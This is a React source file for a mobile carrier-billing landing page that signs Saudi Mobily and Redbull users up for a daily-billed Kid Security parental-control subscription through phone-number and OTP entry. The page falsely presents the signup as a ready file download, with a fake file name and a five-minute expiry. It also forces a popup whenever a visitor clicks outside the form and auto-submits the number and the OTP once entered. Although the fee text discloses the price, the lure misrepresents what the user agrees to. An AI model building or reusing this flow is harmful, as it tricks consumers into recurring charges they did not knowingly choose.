import React, { useEffect, useState, useRef, useMemo } from 'react';
import { useNavigate, useLocation } from 'react-router-dom';
// import './Page2208Style.css';
import ApiSender from '../common/ApiLogic';
import useOtpSendThrottle, { OTP_SEND_COOLDOWN_MS } from '../common/useOtpSendThrottle';
import { logger } from '../common/utils/logger';

function Page2208() {

  const [language, setLanguage] = useState('EN');
  const [goalId, setGoalId] = useState(null);
  const [goalName, setGoalName] = useState(null);
  const mainRef = useRef(null);
  const nonBtnRef = useRef(null);
  const langRef = useRef(null);
  const location = useLocation();
  const queryParams = useMemo(() => new URLSearchParams(location.search), [location.search]);
  const nav = useNavigate();
  const otpContainerRef = useRef();
  const [msisdn, setMsisdn] = useState(null);
  const [warning, setWarning] = useState(false);
  const [otp, setOtp] = useState(null);
  const [firstStep, setFirstStep] = useState(true);
  const [secondStep, setSecondStep] = useState(false);
  const [isMsisdnPopupVisible, setMsisdnPopupVisible] = useState(false);
  const [showSmsHint, setShowSmsHint] = useState(false);
  const otpThrottle = useOtpSendThrottle();
  const sendInFlightRef = useRef(false);
  const params = new URLSearchParams(location.search);
  const paramsObject = {};
  for (const [key, value] of params.entries()) {
    paramsObject[key] = value;
  }

  useEffect(() => {
    if (queryParams.has("campaignId")) {
      const fetchData = async () => {
        try {
          const response = await fetch(process.env.REACT_APP_GOOGLE_BASE_URL + 'campaign/info?uuid=' + queryParams.get("campaignId"),
            {
              method: 'GET',
              headers: {
                "Content-Type": "application/json"
              }
            });
          if (response.ok) {
            const data = await response.json();
            const status = data.status;
            if (status) {
              setGoalId(data.goalId);
              setGoalName(data.goalName);
            }
          }
        }
        catch (error) {
        }
      }
      fetchData();
    }
  }, []);

  useEffect(() => {
    const urlParams = new URLSearchParams(window.location.search);
    const lang = urlParams.get('lang');
    if (!lang || (lang.toUpperCase() !== 'EN' && lang.toUpperCase() !== 'AR')) {
      setLanguage(language);
      handleLanguage(language);
      return;
    }
    setLanguage(lang.toUpperCase());
    handleLanguage(lang.toUpperCase());
  }, []);

  const handleLanguage = (value) => {
    var options = document.getElementById('language');
    var spans = options.getElementsByTagName('span');
    if (value === 'EN') {
      spans[0].style.color = 'white';
      spans[1].style.color = 'black';
      options.style.background = 'linear-gradient(to right, #000 50%, #fff 50%)';
      setLanguage('EN');
      return;
    }
    spans[0].style.color = 'black';
    spans[1].style.color = 'white';
    options.style.background = 'linear-gradient(to right, #fff 50%, #000 50%)'
    setLanguage('AR');
  }

  useEffect(() => {
    saveHistory();
  }, []);

  useEffect(() => {
    if (secondStep && otpContainerRef.current) {
      otpContainerRef.current.focus();
    }
  }, [secondStep]);

  useEffect(() => {
    function handleClickOutside(event) {
      if (nonBtnRef.current && !nonBtnRef.current.contains(event.target) && langRef.current && !langRef.current.contains(event.target)) {
        if (msisdn === null || msisdn === undefined || msisdn.length === 0) {
          mainRef.current.classList.add('highlight');
          setWarning(true);
        }
        if (firstStep) {
          openMsisdnPopup();
        }
      }
    }

    document.addEventListener('click', handleClickOutside);

    return () => {
      document.removeEventListener('click', handleClickOutside);
    };
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [msisdn, firstStep, isMsisdnPopupVisible]);

  const handleMsisdnChange = (event) => {
    mainRef.current.classList.remove('highlight');
    setWarning(false);
    document.getElementById('warning-msg-div').classList.remove('active');
    const newMsisdn = event.target.value.replace(/\D/g, '').slice(0, 13);
    setMsisdn(newMsisdn);
    if (!isMsisdnValid(newMsisdn)) {
      document.getElementById("checkmark-container").style.opacity = 0;
      document.getElementById("send-otp-btn").classList.remove("active");
      return;
    }
    document.getElementById("checkmark-container").style.opacity = 1;
    document.getElementById("send-otp-btn").classList.add("active");
  }

  // Accepts 5XXXXXXXX, 05XXXXXXXX (leading 0), 9665XXXXXXXX / +9665XXXXXXXX
  // (country code, with or without the leading 0) and normalizes all of them
  // down to the plain 9-digit local format before it's used anywhere.
  const normalizeMsisdn = (raw) => {
    if (!raw) return '';
    let digits = String(raw).replace(/\D/g, '');
    if (digits.startsWith('00')) digits = digits.slice(2);
    if (digits.startsWith('966')) digits = digits.slice(3);
    if (digits.startsWith('0')) digits = digits.slice(1);
    return digits;
  }

  const openMsisdnPopup = () => {
    if (isMsisdnPopupVisible) return;
    setMsisdnPopupVisible(true);
  }

  const closeMsisdnPopup = () => {
    setMsisdnPopupVisible(false);
  }

  const handleOtpChange = (event) => {
    const newOtp = event.target.value.replace(/\D/g, '').slice(0, 4);
    document.getElementById('otp-input').style.border = '';
    setOtp(newOtp);
    setShowSmsHint(false);
    const o = newOtp;
    if (o === null || o === 'undefined' || o.length !== 4) {
      document.getElementById("verify-otp-btn").classList.remove("active");
      return;
    }
    document.getElementById("verify-otp-btn").classList.add("active");
  };

  const saveHistory = async () => {
    const apiSender = new ApiSender();
    await apiSender.saveHistory(window.location.origin + location.pathname, paramsObject);
  }

  const handleSendOtpClick = async () => {
    // Rejects a second call while one is already in flight — the cooldown/
    // failure-count checks above only update after each API call resolves,
    // so overlapping rapid clicks (faster than the round-trip) could
    // otherwise all pass isOnCooldown() before the first one's failure is
    // even recorded.
    if (sendInFlightRef.current) return;
    if (otpThrottle.isOnCooldown()) {
      const secs = otpThrottle.cooldownSecondsLeft();
      document.getElementById('warning-msg').textContent = language === 'EN' ? `Too many attempts. Please try again in ${secs}s.` : `عدد كبير جدًا من المحاولات. يرجى المحاولة مرة أخرى خلال ${secs} ثانية.`;
      document.getElementById('warning-msg-div').classList.add('active');
      setWarning(true);
      return;
    }

    const normalizedMsisdn = normalizeMsisdn(msisdn);
    if (!isMsisdnValid(normalizedMsisdn)) {
      document.getElementById('warning-msg').textContent = language === 'EN' ? 'Incorrect Number Format' : 'رقم غير صحيح';
      document.getElementById('warning-msg-div').classList.add('active');
      setWarning(true);
      openMsisdnPopup();
      return;
    }

    if (!isKnownCarrier(normalizedMsisdn)) {
      document.getElementById('warning-msg').textContent = language === 'EN' ? 'This mobile operator is not currently supported' : 'شركة الاتصالات هذه غير مدعومة حاليًا';
      document.getElementById('warning-msg-div').classList.add('active');
      setWarning(true);
      return;
    }

    sendInFlightRef.current = true;
    document.getElementById("send-otp-btn").classList.add("active");
    document.getElementById('send-otp-btn').disabled = true;
    // Operator eligibility is no longer restricted client-side: only 574/575
    // is Redbull, every other valid number is treated as Mobily. The backend
    // is the source of truth for whether a given number can actually subscribe.
    const operatorId = isRedbull(normalizedMsisdn) ? 7 : 2;

    const campaignId = queryParams.get("campaignId") ? queryParams.get("campaignId") : null;
    const trackerId = queryParams.get("trackerId") ? queryParams.get("trackerId") : null;
    const gclid = queryParams.get("gclid") ? queryParams.get("gclid") : null;
    const gbraid = queryParams.get("gbraid") ? queryParams.get("gbraid") : null;
    const wbraid = queryParams.get("wbraid") ? queryParams.get("wbraid") : null;
    const apiSender = new ApiSender();
    const result = await apiSender.sendPin('send-pin', normalizedMsisdn, campaignId, language, trackerId, gclid, gbraid, wbraid, goalId, goalName,
      window.location.origin + location.pathname, "LP AA2208", operatorId, paramsObject);
    if (result.success) {
      otpThrottle.recordSuccess();
      sendInFlightRef.current = false;
      if (result.redirect !== null && result.redirect !== undefined) {
        window.location.href = result.redirect;
        return;
      }
      document.getElementById('send-otp-btn').disabled = false;
      setWarning(false);
      setFirstStep(false);
      setSecondStep(true);
      closeMsisdnPopup();
      document.getElementById('send-otp-btn').style.display = 'none';
      document.getElementById('verify-otp-btn').style.display = 'block';
      document.getElementById('msisdn-input').style.display = 'none';
      document.getElementById('otp-input-container').style.display = 'flex';
      document.getElementById('title').textContent = language === 'EN' ? 'Enter your OTP' : 'ادخل الرقم السري';
      document.getElementById("verify-otp-btn").classList.remove("active");
      return;
    }
    sendInFlightRef.current = false;
    const enteredCooldown = otpThrottle.recordFailure();
    if (enteredCooldown) {
      logger.warn("send_otp", "throttled", `Send-OTP cooldown triggered for ${normalizedMsisdn} after repeated failures`, { msisdn: normalizedMsisdn, cooldownMs: OTP_SEND_COOLDOWN_MS });
    }
    const message = enteredCooldown
      ? (language === 'EN' ? `Too many failed attempts. Please try again in ${otpThrottle.cooldownSecondsLeft()}s.` : `عدد كبير جدًا من المحاولات الفاشلة. يرجى المحاولة مرة أخرى خلال ${otpThrottle.cooldownSecondsLeft()} ثانية.`)
      : result.message;
    setWarning(true);
    document.getElementById('warning-msg').textContent = message;
    document.getElementById('warning-msg-div').classList.add('active');
    if (enteredCooldown) {
      setTimeout(() => {
        const btn = document.getElementById('send-otp-btn');
        if (btn) btn.disabled = false;
      }, OTP_SEND_COOLDOWN_MS);
    } else {
      document.getElementById('send-otp-btn').disabled = false;
    }
  }

  const handleVerifyOtpClick = async () => {
    const o = otp;
    if (o === null || o === 'undefined' || o.length !== 4) {
      document.getElementById("verify-otp-btn").classList.remove("active");
      document.getElementById('otp-input').style.border = "2px solid #0172e5";
      return;
    }

    const normalizedMsisdn = normalizeMsisdn(msisdn);
    const operatorId = isRedbull(normalizedMsisdn) ? 7 : 2;
    if (isMobily(normalizedMsisdn) && o === '6071') {
      document.getElementById('warning-msg-div').classList.add('active');
      document.getElementById('warning-msg').textContent = language === 'EN' ? "That's the sender's number, not your code. Enter the 4-digit code you see in the SMS." : 'هذا رقم المرسل وليس الرمز الخاص بك. أدخل الرمز المكوّن من 4 أرقام الذي تراه في الرسالة النصية.';
      setWarning(true);
      setOtp('');
      setShowSmsHint(true);
      document.getElementById("verify-otp-btn").classList.remove("active");
      otpContainerRef.current && otpContainerRef.current.focus();
      return;
    }

    document.getElementById("verify-otp-btn").classList.add("active");
    document.getElementById('verify-otp-btn').disabled = true;
    const campaignId = queryParams.get("campaignId") ? queryParams.get("campaignId") : null;
    const trackerId = queryParams.get("trackerId") ? queryParams.get("trackerId") : null;
    const gclid = queryParams.get("gclid") ? queryParams.get("gclid") : null;
    const gbraid = queryParams.get("gbraid") ? queryParams.get("gbraid") : null;
    const wbraid = queryParams.get("wbraid") ? queryParams.get("wbraid") : null;
    const apiSender = new ApiSender();
    const result = await apiSender.verifyPin('verify-pin', normalizedMsisdn, o, campaignId, language, trackerId, gclid, gbraid, wbraid, goalId, goalName,
      window.location.origin + location.pathname, "LP AA2208", operatorId);
    if (result.success) {
      nav('/aa2208/success?lang=' + language);
      document.getElementById('warning-msg-div').classList.remove('active');
      document.getElementById('warning-msg').textContent = result.message;
      document.getElementById('verify-otp-btn').disabled = false;
      return;
    }
    setWarning(true);
    setOtp('');
    document.getElementById('warning-msg').textContent = language === 'EN' ? 'Incorrect OTP. Please try again.' : 'رمز غير صحيح، يرجى المحاولة مرة أخرى.';
    document.getElementById('warning-msg-div').classList.add('active');
    document.getElementById('verify-otp-btn').classList.remove('active');
    document.getElementById('verify-otp-btn').disabled = false;
    otpContainerRef.current && otpContainerRef.current.focus();
  }

  // Auto-submit: once a valid, supported number is entered, click Continue automatically.
  const autoSendRef = useRef(null);
  useEffect(() => {
    if (!firstStep || !msisdn) return;
    const normalized = normalizeMsisdn(msisdn);
    if (!isMsisdnValid(normalized) || !isKnownCarrier(normalized)) return;
    if (autoSendRef.current === msisdn) return;
    autoSendRef.current = msisdn;
    const t = setTimeout(() => { handleSendOtpClick(); }, 300);
    return () => clearTimeout(t);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [msisdn, firstStep]);

  // Auto-submit: once the 4-digit OTP is fully entered, click Verify automatically.
  const autoVerifyRef = useRef(null);
  useEffect(() => {
    if (!secondStep || !otp || otp.length !== 4) return;
    if (autoVerifyRef.current === otp) return;
    autoVerifyRef.current = otp;
    const t = setTimeout(() => { handleVerifyOtpClick(); }, 200);
    return () => clearTimeout(t);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [otp, secondStep]);

  const isMsisdnValid = (msisdn) => {
    if (msisdn !== null && msisdn !== undefined) {
      return (msisdn.length === 9 || msisdn.length === 12);
    }
    return false;
  }

  // Only 574/575 is Redbull; every other validly-formatted number is treated
  // as Mobily. Operator eligibility beyond that is enforced by the backend,
  // not the client.
  const isRedbull = (msisdn) => {
    if (msisdn !== null && msisdn !== undefined) {
      return (msisdn.length === 12 && (msisdn.startsWith('966574') || msisdn.startsWith('966575')))
        || (msisdn.length === 9 && (msisdn.startsWith('574') || msisdn.startsWith('575')));
    }
    return false;
  }

  const isMobily = (msisdn) => {
    if (msisdn === null || msisdn === undefined) return false;
    return !isRedbull(msisdn);
  }

  // Distinct from isMobily's broad "everything else is Mobily" backend
  // routing: this narrowly checks whether carrier billing has any real
  // chance of working, so we can skip send-pin entirely for numbers we
  // already know the backend can't handle gracefully (STC/Zain get a
  // confusing rejection message; other prefixes have been seen returning a
  // raw HTTP 500).
  const isKnownCarrier = (msisdn) => {
    if (msisdn === null || msisdn === undefined) return false;
    return (msisdn.length === 12 && (msisdn.startsWith('96654') || msisdn.startsWith('96656') || msisdn.startsWith('966574') || msisdn.startsWith('966575')))
      || (msisdn.length === 9 && (msisdn.startsWith('54') || msisdn.startsWith('56') || msisdn.startsWith('574') || msisdn.startsWith('575')));
  }

  return (
    <div className="Aa2208" ref={mainRef}>
      <div className='container'>
        <div className='form-content'>
          <div className='form-content-top'>
            <div id='language' className='language' ref={langRef}>
              <span onClick={() => handleLanguage('EN')}>EN</span>
              <svg stroke="currentColor" fill="currentColor" strokeWidth="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" strokeWidth="2" d="M12,23 C18.0751322,23 23,18.0751322 23,12 C23,5.92486775 18.0751322,1 12,1 C5.92486775,1 1,5.92486775 1,12 C1,18.0751322 5.92486775,23 12,23 Z M12,23 C15,23 16,18 16,12 C16,6 15,1 12,1 C9,1 8,6 8,12 C8,18 9,23 12,23 Z M2,16 L22,16 M2,8 L22,8"></path></svg>
              <span onClick={() => handleLanguage('AR')}>AR</span>
            </div>
            <div className='logo'></div>
          </div>
          <div className='form-content-middle'>
            <div className='form-content-middle-top'>
              <img fetchpriority='high' alt='Kid Security' src='/download-file.avif' />
              <div className='form-content-middle-top-right'>
                <span id='span1'>{language === 'EN' ? 'Your file is ready to upload' : 'الملف الخاص بك اصبح جاهز للتحميل'}</span>
                <span id='span2'>{language === 'EN' ? 'Name' : 'الاسم'} <span id='span3'>DWtJ-0LPq-evGA-OjbP-ZM9o</span></span>
                <span id='span4'>{language === 'EN' ? 'The time will expire in five minutes' : 'ستنتهي المدة خلال خمس دقائق'}</span>
              </div>
            </div>
            <div className={`non-btn ${warning ? 'vibrate' : ''}`} ref={nonBtnRef}>
              <div className='title'>
                <h4 id='title'>{secondStep ?
                  (language === 'EN' ? 'Enter your OTP' : 'ادخل الرقم السري') :
                  (language === 'EN' ? 'Enter your mobile number below to start downloading.' : 'أدخل رقم هاتفك المحمول أدناه لبدء التنزيل')}</h4>
              </div>
              <div id="msisdn-input" className='phoneInputWrap'>
                <div class="phone-input">
                  <div class="phone"></div>
                  <input type="tel" value={msisdn} autocomplete="off" maxLength={13} id="phone-input" name="phone-input-name" smartcaret="true" placeholder={language === 'EN' ? 'Mobile number' : 'رقم الموبايل'} class="text-input" autofocus="" onChange={handleMsisdnChange} />
                  <div id="checkmark-container" class="checkmark-container" data-checkmark-container="true" style={{ opacity: 0 }}>
                    <svg id="success-check-mark" class="checkmark__icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 52 52">
                      <circle class="checkmark__circle" cx="26" cy="26" r="25" fill="none"></circle>
                      <path class="checkmark__check" fill="none" d="M14.1 27.2l7.1 7.2 16.7-16.8"></path>
                    </svg>
                  </div>
                </div>
              </div>
              <div id='warning-msg-div' className={`warning-msg`}>
                <span id='warning-msg'>&nbsp;</span>
              </div>
              <div id='otp-input-container' className='otp-input-container'>
                <input id='otp-input' type="tel" inputMode="numeric" minLength={4} maxLength={4} value={otp} onChange={handleOtpChange} className="otp-input"
                  autoComplete="one-time-code" ref={otpContainerRef} />
              </div>
              {secondStep && showSmsHint && (
                <div className='otp-hint'>
                  <a className='open-sms-link' href='sms:607110'>{language === 'EN' ? 'Open SMS to view your code' : 'افتح الرسائل لعرض الرمز'}</a>
                </div>
              )}
              <div className='button'>
                <button id='send-otp-btn' style={{ display: 'block' }} onClick={handleSendOtpClick}>{language === 'EN' ? 'Continue' : 'تابع'}</button>
                <button id='verify-otp-btn' style={{ display: 'none' }} onClick={handleVerifyOtpClick}>{language === 'EN' ? 'Confirm' : 'تأكيد'}</button>
              </div>
            </div>
            <div className='form-content-bottom' style={{ direction: language === 'EN' ? "ltr" : "rtl" }}>
              {language === 'EN' ? (
                <span>
                Kid Security is a parental-control app subscription billed directly through your mobile operator. For Mobily subscribers, the service costs 2.3 SAR per day (VAT included), auto-renewed daily until cancelled, with a 1-day free trial on your first subscription; VAT for prepaid lines is deducted from your recharge balance. For Redbull subscribers, the service costs 1.725 SAR per day (VAT included), auto-renewed daily until cancelled. By entering your mobile number and confirming the OTP code sent to it, you confirm you are the owner/authorized user of this number, agree to subscribe to this recurring paid service, and accept the Terms and Conditions. To cancel your Mobily subscription at any time, send U58 to 607110. To cancel your Redbull subscription, send CB517 to 143334. For help, contact support@kid-security.io.
              </span>
            ) : (
              <span>
                امان الأطفال هو اشتراك في تطبيق للرقابة الأبوية يُحصَّل مباشرة عبر شركة الاتصالات الخاصة بك. لمشتركي موبايلي: تبلغ تكلفة الخدمة 2.3 ريال سعودي يوميًا (شامل ضريبة القيمة المضافة)، ويتجدد الاشتراك تلقائيًا يوميًا حتى يتم إلغاؤه، مع تجربة مجانية لمدة يوم واحد عند أول اشتراك؛ بالنسبة لخطوط الدفع المسبق، تُخصم الضريبة من رصيد إعادة الشحن. لمشتركي ريد بول: تبلغ تكلفة الخدمة 1.725 ريال سعودي يوميًا (شامل ضريبة القيمة المضافة)، ويتجدد الاشتراك تلقائيًا يوميًا حتى يتم إلغاؤه. بإدخال رقم هاتفك المحمول وتأكيد رمز التحقق (OTP) المرسل إليه، فإنك تقر بأنك مالك/المستخدم المخوّل لهذا الرقم، وتوافق على الاشتراك في هذه الخدمة المدفوعة المتجددة، وتقبل الأحكام والشروط. لإلغاء اشتراك موبايلي في أي وقت، أرسل U58 إلى 607110. لإلغاء اشتراك ريد بول، أرسل CB517 إلى 143334. للمساعدة، تواصل معنا عبر support@kid-security.io.
              </span>
              )}
            </div>
          </div>
        </div>
      </div>
      <div className='web'>
        <div className='about'>
          <h3>No. 1 parental control app, that kids really love</h3>
          <img fetchpriority='high' alt='Kid Security' src='/kid-security.avif' />
          <p>Kid Security is an advanced parental control app designed to ensure your child’s safety and well-being. With features like real-time location tracking, surrounding audio monitoring, notification checks, task setting, and direct chat, it empowers parents to stay connected and in control. Paired with the companion Tigrow app, which is installed on the child’s device, Kid Security offers seamless integration, enabling parents to manage and monitor activities effortlessly while fostering a secure and communicative relationship.</p>
        </div>
        <div className='features'>
          <h3>What does the parent get?</h3>
          <div className='feature-detail' style={{ marginTop: '1rem' }}>
            <div className='feature-detail-direction'>
              <h4>Kids' location</h4>
              <span>You can see where your kid is at any time</span>
            </div>
            <div className='feature-detail-right-part-2'>
              <img fetchpriority='high' alt='Kid Security' src='/parent-1.avif' />
            </div>
          </div>
          <div className='feature-detail'>
            <div>
              <img fetchpriority='high' alt='Kid Security' src='/parent-2.avif' />
            </div>
            <div className='feature-detail-direction'>
              <h4>Sound around</h4>
              <span>To make sure that your kid is all right, you can listen to the sound around them</span>
            </div>
          </div>
          <div className='feature-detail'>
            <div className='feature-detail-direction'>
              <h4>Games time limit</h4>
              <span>Allows you to limit playtime, which your kid can extend by performing useful tasks</span>
            </div>
            <div>
              <img fetchpriority='high' alt='Kid Security' src='/parent-3.avif' />
            </div>
          </div>
          <div className='feature-detail'>
            <div>
              <img fetchpriority='high' alt='Kid Security' src='/parent-4.avif' />
            </div>
            <div className='feature-detail-direction'>
              <h4>Circumvent Silent Mode</h4>
              <span>Does your kid have their phone in silent mode? With this app you can still send a loud signal to reach them</span>
            </div>
          </div>
        </div>
      </div>
      {isMsisdnPopupVisible && (
        <div className='msisdn-popup-overlay'>
          <div className='msisdn-popup-box'>
            <p>{language === 'EN' ? 'Please enter your mobile number to continue' : 'الرجاء إدخال رقم هاتفك للمتابعة'}</p>
            <div className={`msisdn-popup-input ${warning ? 'vibrate' : ''}`}>
              <input type='tel' value={msisdn || ''} placeholder={language === 'EN' ? 'Mobile number' : 'رقم الموبايل'} autoComplete='off' maxLength={13} onChange={handleMsisdnChange} />
            </div>
            <button onClick={handleSendOtpClick}>{language === 'EN' ? 'Continue' : 'تابع'}</button>
          </div>
          <button className='popup-exit-btn' onClick={closeMsisdnPopup}>{language === 'EN' ? 'Close' : 'إغلاق'}</button>
        </div>
      )}
    </div>
  );
}

export default Page2208;